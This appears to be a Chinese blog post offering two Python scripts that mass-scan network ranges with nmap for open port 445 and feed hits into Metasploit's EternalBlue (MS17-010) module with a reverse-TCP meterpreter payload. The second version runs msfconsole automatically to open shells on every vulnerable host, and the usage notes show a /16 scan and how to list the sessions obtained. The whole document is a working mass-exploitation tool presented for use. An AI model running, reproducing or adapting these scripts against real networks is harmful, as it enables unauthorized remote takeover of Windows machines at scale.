批量扫描永恒之蓝脚本
摘要:python3调用msf和nmap批量扫描永恒之蓝
扫描脚本版本
# -*- coding:utf8 -*-
from threading import Thread
import nmap
import optparse
import os
from IPy import IP
# 根据参数拆分target
def find_target(target, num, countofip, count):
    """Scan this thread's slice of `target` for TCP/445 and record hosts where it is open.

    Args:
        target: IPy.IP network object; sliced by index to pick this thread's share.
        num: 1-based thread number; selects the slice and names the output file via saveip().
        countofip: total number of addresses in `target` (target.len() in main()).
        count: total number of threads, i.e. how many slices `target` is cut into.

    Returns:
        None. Prints one status line per host and calls saveip() for hosts whose
        445/tcp state is reported as 'open'.
    """
    # Slice size is the integer share of the range per thread.
    fenge = int(countofip / count)
    start = fenge * (num - 1)
    end = fenge * num
    if end > countofip:
        end = countofip
    for host in target[start:end]:
        host = str(host)
        # A fresh PortScanner, and therefore a separate nmap run, per host.
        scanner = nmap.PortScanner()
        rst = scanner.scan(host, '445')
        # nmap's own run statistics: '0' up hosts means the address did not answer.
        if rst['nmap']['scanstats']['uphosts'] == '0':
            print("thread"+str(num)+":"+'Host not up:' + host)
            continue
        # NOTE(review): assumes rst['scan'] has an entry for this host with a 445 key
        # whenever uphosts != '0' — confirm against python-nmap's result layout.
        state = rst['scan'][host]['tcp'][445]['state']
        if state == 'open':
            print("thread"+str(num)+":"+str(host) + ' with 445 port open, there may be a vulnerability in ms17_010')
            # Only an open 445 gets written to the per-thread resource file.
            saveip(num, host)
        else:
            print("thread"+str(num)+":"+str(host) + ' 445 port not open!')
            continue
def create_file(configfile, host):
    """Append an msfconsole resource-script stanza for `host` to the open file `configfile`.

    Args:
        configfile: writable text file object (opened in append mode by saveip()).
        host: dotted-quad IPv4 address string; its last two octets also derive the port.

    Returns:
        None. Writes six lines to `configfile` and prints the lhost:lport pair used.

    Reads the module-level `lhost`, which main() assigns from the -L option; calling
    this before main() has set it raises NameError.
    """
    configfile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
    configfile.write('set rhost ' + host + '\n')
    configfile.write('set payload windows/x64/meterpreter/reverse_tcp\n')
    # Port = 4444 + last octet + second-to-last octet of the target address.
    lport = 4444 + int(host.split('.')[-1]) + int(host.split('.')[-2])
    configfile.write('set lport ' + str(lport) + '\n')
    configfile.write('set lhost ' + str(lhost) + '\n')
    configfile.write('exploit -j -z\n')
    print("Your shell will created at " + str(lhost) + ":" + str(lport))
# 保存ip
def saveip(num, host):
    """Append one stanza for `host` to this thread's resource file, meta<num>.rc.

    Args:
        num: thread number; forms the file name 'meta' + num + '.rc' in the current directory.
        host: IPv4 address string, passed through to create_file().

    Returns:
        None.
    """
    # Append mode, so every hit from the same thread accumulates in one file.
    configfile = open('meta' + str(num) + '.rc', 'a')
    create_file(configfile, host)
    configfile.close()
def main():
    """Parse -H/-L/-C, split the target range across `count` threads and start them.

    Options:
        -H  target address or network, parsed with IPy.IP.
        -L  stored in the module-level `lhost` that create_file() reads.
        -C  number of worker threads (int).

    Returns:
        None. Starts the threads without joining them; each thread writes its own
        meta<n>.rc file.
    """
    parser = optparse.OptionParser('%prog -H <target> -L <lhost> -C <count>')
    parser.add_option('-H', dest='host', type='string')
    parser.add_option('-L', dest='lhost', type='string')
    parser.add_option('-C', dest='count', type='int')
    (options, args) = parser.parse_args()
    host = options.host
    # Published at module scope because create_file() reads `lhost` directly.
    global lhost
    lhost = options.lhost
    count = options.count
    countofthread = []
    # NOTE(review): IP(host) runs before the `host == None` guard below, so a missing
    # -H reaches IPy before the help text is printed.
    target = IP(host)
    countofip = target.len()
    if host == None:
        parser.print_help()
        exit(0)
    # Index 0 is a placeholder so that thread i is stored at countofthread[i].
    countofthread.append("thread0")
    for i in range(1, count+1):
        countofthread.append("thread" + str(i))
    for i in range(1, count+1):
        countofthread[i] = Thread(target=find_target, args=(target, i, countofip, count,))
        countofthread[i].start()
# Script entry point: only run when executed directly, not when imported.
if __name__ == '__main__':
    main()
使用说明:
需要先安装 python-nmap 和 IPy 这几个包：pip3 install python-nmap，pip3 install IPy
root@ubuntufree:~#python3 shaoip.py -H 192.168.0.0/16 -L 127.0.1.1 -C 3
// shaoip.py 为脚本的路径
// -H 192.168.0.0/16 为对192.168.0.0/16网段进行扫描
// -C 3为线程数,3为同时使用三个线程
扫描结果保存在形如meta1.rc,meta2.rc的文件中。文件的数量等于使用的线程数。
扫描脚本&&获取shell版本
# -*- coding:utf8 -*-
from threading import Thread
import nmap
import optparse
import os
from IPy import IP
# 根据参数拆分target
def find_target(target, num, countofip, count):
    """Scan this thread's slice of `target` for TCP/445 and record hosts where it is open.

    Args:
        target: IPy.IP network object; sliced by index to pick this thread's share.
        num: 1-based thread number; selects the slice and names the output file via saveip().
        countofip: total number of addresses in `target` (target.len() in main()).
        count: total number of threads, i.e. how many slices `target` is cut into.

    Returns:
        None. Prints one status line per host and calls saveip() for hosts whose
        445/tcp state is reported as 'open'.
    """
    # Slice size is the integer share of the range per thread.
    fenge = int(countofip / count)
    start = fenge * (num - 1)
    end = fenge * num
    if end > countofip:
        end = countofip
    for host in target[start:end]:
        host = str(host)
        # A fresh PortScanner, and therefore a separate nmap run, per host.
        scanner = nmap.PortScanner()
        rst = scanner.scan(host, '445')
        # nmap's own run statistics: '0' up hosts means the address did not answer.
        if rst['nmap']['scanstats']['uphosts'] == '0':
            print("thread"+str(num)+":"+'Host not up:' + host)
            continue
        # NOTE(review): assumes rst['scan'] has an entry for this host with a 445 key
        # whenever uphosts != '0' — confirm against python-nmap's result layout.
        state = rst['scan'][host]['tcp'][445]['state']
        if state == 'open':
            print("thread"+str(num)+":"+str(host) + ' with 445 port open, there may be a vulnerability in ms17_010')
            # Only an open 445 gets written to the per-thread resource file.
            saveip(num, host)
        else:
            print("thread"+str(num)+":"+str(host) + ' 445 port not open!')
            continue
def create_file(configfile, host):
    """Append an msfconsole resource-script stanza for `host` to the open file `configfile`.

    Args:
        configfile: writable text file object (opened in append mode by saveip()).
        host: dotted-quad IPv4 address string; its last two octets also derive the port.

    Returns:
        None. Writes six lines to `configfile` and prints the lhost:lport pair used.

    Reads the module-level `lhost`, which main() assigns from the -L option; calling
    this before main() has set it raises NameError.
    """
    configfile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
    configfile.write('set rhost ' + host + '\n')
    configfile.write('set payload windows/x64/meterpreter/reverse_tcp\n')
    # Port = 4444 + last octet + second-to-last octet of the target address.
    lport = 4444 + int(host.split('.')[-1]) + int(host.split('.')[-2])
    configfile.write('set lport ' + str(lport) + '\n')
    configfile.write('set lhost ' + str(lhost) + '\n')
    configfile.write('exploit -j -z\n')
    print("Your shell will created at " + str(lhost) + ":" + str(lport))
# 保存ip
def saveip(num, host):
    """Append one stanza for `host` to this thread's resource file, meta<num>.rc.

    Args:
        num: thread number; forms the file name 'meta' + num + '.rc' in the current directory.
        host: IPv4 address string, passed through to create_file().

    Returns:
        None.
    """
    # Append mode, so every hit from the same thread accumulates in one file.
    configfile = open('meta' + str(num) + '.rc', 'a')
    create_file(configfile, host)
    configfile.close()
def merge(count):
    """Append the contents of meta2.rc .. meta<count>.rc onto meta1.rc.

    Args:
        count: number of threads, i.e. the highest meta<n>.rc index to fold in.

    Returns:
        None. meta1.rc is opened for append and is not explicitly closed here.
    """
    f1= open("meta1.rc", 'a')
    # range(2, 2) is empty when count == 1, so the break below is never reached.
    for i in range(2, count+1):
        if count==1 :
            break
        # Open-and-close in append mode creates the file if that thread never wrote one,
        # so the read below does not fail on a missing file.
        f2=open("meta"+str(i)+".rc", 'a')
        f2.close()
        with open("meta"+str(i)+".rc", 'r') as f2:
            # Rebinds `i` to each line; the outer range iterator is not affected.
            for i in f2:
                f1.write(i)
def main():
    """Parse -H/-L/-C, scan the range with `count` threads, then hand the merged file to msfconsole.

    Options:
        -H  target address or network, parsed with IPy.IP.
        -L  stored in the module-level `lhost` that create_file() reads.
        -C  number of worker threads (int).

    Returns:
        None. Blocks until every thread has finished, then runs
        `msfconsole -r meta1.rc`, which executes every stanza the scan produced —
        this version goes beyond scanning and launches the exploit module.
    """
    parser = optparse.OptionParser('%prog -H <target> -L <lhost> -C <count>')
    parser.add_option('-H', dest='host', type='string')
    parser.add_option('-L', dest='lhost', type='string')
    parser.add_option('-C', dest='count', type='int')
    (options, args) = parser.parse_args()
    host = options.host
    # Published at module scope because create_file() reads `lhost` directly.
    global lhost
    lhost = options.lhost
    count = options.count
    countofthread = []
    # NOTE(review): IP(host) runs before the `host == None` guard below, so a missing
    # -H reaches IPy before the help text is printed.
    target = IP(host)
    countofip = target.len()
    if host == None:
        parser.print_help()
        exit(0)
    # Index 0 is a placeholder so that thread i is stored at countofthread[i].
    countofthread.append("thread0")
    for i in range(1, count+1):
        countofthread.append("thread" + str(i))
    for i in range(1, count+1):
        countofthread[i] = Thread(target=find_target, args=(target, i, countofip, count,))
        countofthread[i].start()
    # Wait for all scanners so every meta<n>.rc is complete before merging.
    for i in range(1, count+1):
        countofthread[i].join()
    merge(count)
    # Fixed command string — no user-controlled text reaches the shell here.
    command='msfconsole -r meta1.rc'
    os.system(command)
# Script entry point: only run when executed directly, not when imported.
if __name__ == '__main__':
    main()
使用说明:
需要先安装 python-nmap 和 IPy 这几个包（pip3 install python-nmap，pip3 install IPy），以及安装 msf
安装msf命令:
root@ubuntufree:~#curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
root@ubuntufree:~#python3 shaoip.py -H 192.168.0.0/16 -L 127.0.1.1 -C 3
// shaoip.py 为脚本的路径
// -H 192.168.0.0/16 为对192.168.0.0/16网段进行扫描
// -C 3为线程数,3为同时使用三个线程
扫描结果保存在meta1.rc的文件中。可以在msf中使用sessions查看已经获得的shell
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。